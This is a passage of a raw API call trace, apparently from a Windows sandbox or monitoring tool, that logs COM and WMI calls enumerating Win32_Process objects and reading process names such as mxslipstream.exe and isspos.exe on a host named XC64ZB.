Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5529f98) returned 0x0 [0265.411] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f98, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.411] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f98, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.411] WbemDefPath:IUnknown:AddRef (This=0x5529f98) returned 0x3 [0265.411] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f98, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.411] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f98, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.411] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f98, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5536910) returned 0x0 [0265.411] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5536910, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.411] WbemDefPath:IUnknown:Release (This=0x5536910) returned 0x3 [0265.411] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f98, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.411] WbemDefPath:IUnknown:Release (This=0x5529f98) returned 0x2 [0265.411] WbemDefPath:IUnknown:Release (This=0x5529f98) returned 0x1 [0265.412] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529f98, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5529f98) returned 0x0 [0265.412] WbemDefPath:IUnknown:AddRef (This=0x5529f98) returned 0x3 [0265.412] WbemDefPath:IUnknown:Release (This=0x5529f98) returned 0x2 [0265.412] WbemDefPath:IWbemPath:SetText (This=0x5529f98, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4424\"") returned 0x0 [0265.412] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.412] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.412] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.412] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.412] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.412] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.412] IWbemClassObject:Get (in: This=0x553a2d0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e9430*=0, plFlavor=0x23e9434*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="mxslipstream.exe", varVal2=0x0), pType=0x23e9430*=8, plFlavor=0x23e9434*=0) returned 0x0 [0265.412] SysStringByteLen (bstr="mxslipstream.exe") returned 0x20 [0265.412] SysStringByteLen (bstr="mxslipstream.exe") returned 0x20 [0265.412] IWbemClassObject:Get (in: This=0x553a2d0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e9430*=8, plFlavor=0x23e9434*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="mxslipstream.exe", varVal2=0x0), pType=0x23e9430*=8, plFlavor=0x23e9434*=0) returned 0x0 [0265.412] SysStringByteLen (bstr="mxslipstream.exe") returned 0x20 [0265.412] SysStringByteLen (bstr="mxslipstream.exe") returned 0x20 [0265.412] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.413] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x553af90, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.413] IUnknown:QueryInterface (in: This=0x553af90, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x553af90) returned 0x0 [0265.413] IUnknown:QueryInterface (in: This=0x553af90, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.413] IUnknown:QueryInterface (in: This=0x553af90, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.413] IUnknown:QueryInterface (in: This=0x553af90, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.414] IUnknown:AddRef (This=0x553af90) returned 0x3 [0265.414] IUnknown:QueryInterface (in: This=0x553af90, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.414] IUnknown:QueryInterface (in: This=0x553af90, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.414] IUnknown:QueryInterface (in: This=0x553af90, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x553af94) returned 0x0 [0265.414] IMarshal:GetUnmarshalClass (in: This=0x553af94, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.414] IUnknown:Release (This=0x553af94) returned 0x3 [0265.414] IUnknown:QueryInterface (in: This=0x553af90, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.414] IUnknown:Release (This=0x553af90) returned 0x2 [0265.414] IUnknown:QueryInterface (in: This=0x553af90, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x553af90) returned 0x0 [0265.414] IUnknown:AddRef (This=0x553af90) returned 0x4 [0265.414] IUnknown:Release (This=0x553af90) returned 0x3 [0265.414] IUnknown:Release (This=0x553af90) returned 0x2 [0265.414] CoTaskMemFree (pv=0x54ba398) [0265.414] IUnknown:AddRef (This=0x553af90) returned 0x3 [0265.414] IWbemClassObject:Get (in: This=0x553af90, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.414] IWbemClassObject:Get (in: This=0x553af90, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4432\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.415] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4432\"") returned 0x5e [0265.415] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4432\"") returned 0x5e [0265.415] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.415] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.415] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.415] IUnknown:Release (This=0x601a94) returned 0x1 [0265.416] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0265.416] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.416] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a0e8) returned 0x0 [0265.417] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0265.417] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a0e8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a0e8) returned 0x0 [0265.417] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a0e8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.417] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a0e8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.417] WbemDefPath:IUnknown:AddRef (This=0x552a0e8) returned 0x3 [0265.417] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a0e8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.417] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a0e8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.417] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a0e8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5536c88) returned 0x0 [0265.417] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5536c88, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.417] WbemDefPath:IUnknown:Release (This=0x5536c88) returned 0x3 [0265.417] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a0e8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.417] WbemDefPath:IUnknown:Release (This=0x552a0e8) returned 0x2 [0265.417] WbemDefPath:IUnknown:Release (This=0x552a0e8) returned 0x1 [0265.417] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a0e8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a0e8) returned 0x0 [0265.417] WbemDefPath:IUnknown:AddRef (This=0x552a0e8) returned 0x3 [0265.417] WbemDefPath:IUnknown:Release (This=0x552a0e8) returned 0x2 [0265.417] WbemDefPath:IWbemPath:SetText (This=0x552a0e8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4432\"") returned 0x0 [0265.418] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.418] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.418] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.418] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.418] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.418] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.418] IWbemClassObject:Get (in: This=0x553af90, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e9cd4*=0, plFlavor=0x23e9cd8*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="isspos.exe", varVal2=0x0), pType=0x23e9cd4*=8, plFlavor=0x23e9cd8*=0) returned 0x0 [0265.418] SysStringByteLen (bstr="isspos.exe") returned 0x14 [0265.418] SysStringByteLen (bstr="isspos.exe") returned 0x14 [0265.419] IWbemClassObject:Get (in: This=0x553af90, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e9cd4*=8, plFlavor=0x23e9cd8*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="isspos.exe", varVal2=0x0), pType=0x23e9cd4*=8, plFlavor=0x23e9cd8*=0) returned 0x0 [0265.419] SysStringByteLen (bstr="isspos.exe") returned 0x14 [0265.419] SysStringByteLen (bstr="isspos.exe") returned 0x14 [0265.419] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.419] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x5539fa0, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.419] IUnknown:QueryInterface (in: This=0x5539fa0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5539fa0) returned 0x0 [0265.420] IUnknown:QueryInterface (in: This=0x5539fa0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.420] IUnknown:QueryInterface (in: This=0x5539fa0, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.420] IUnknown:QueryInterface (in: This=0x5539fa0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.420] IUnknown:AddRef (This=0x5539fa0) returned 0x3 [0265.420] IUnknown:QueryInterface (in: This=0x5539fa0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.420] IUnknown:QueryInterface (in: This=0x5539fa0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.420] IUnknown:QueryInterface (in: This=0x5539fa0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5539fa4) returned 0x0 [0265.420] IMarshal:GetUnmarshalClass (in: This=0x5539fa4, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.420] IUnknown:Release (This=0x5539fa4) returned 0x3 [0265.420] IUnknown:QueryInterface (in: This=0x5539fa0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.420] IUnknown:Release (This=0x5539fa0) returned 0x2 [0265.420] IUnknown:QueryInterface (in: This=0x5539fa0, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5539fa0) returned 0x0 [0265.420] IUnknown:AddRef (This=0x5539fa0) returned 0x4 [0265.420] IUnknown:Release (This=0x5539fa0) returned 0x3 [0265.420] IUnknown:Release (This=0x5539fa0) returned 0x2 [0265.420] CoTaskMemFree (pv=0x54ba2d8) [0265.420] IUnknown:AddRef (This=0x5539fa0) returned 0x3 [0265.420] IWbemClassObject:Get (in: This=0x5539fa0, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.421] IWbemClassObject:Get (in: This=0x5539fa0, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4440\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.421] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4440\"") returned 0x5e [0265.421] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4440\"") returned 0x5e [0265.421] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.421] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.421] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.421] IUnknown:Release (This=0x601a94) returned 0x1 [0265.422] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.422] 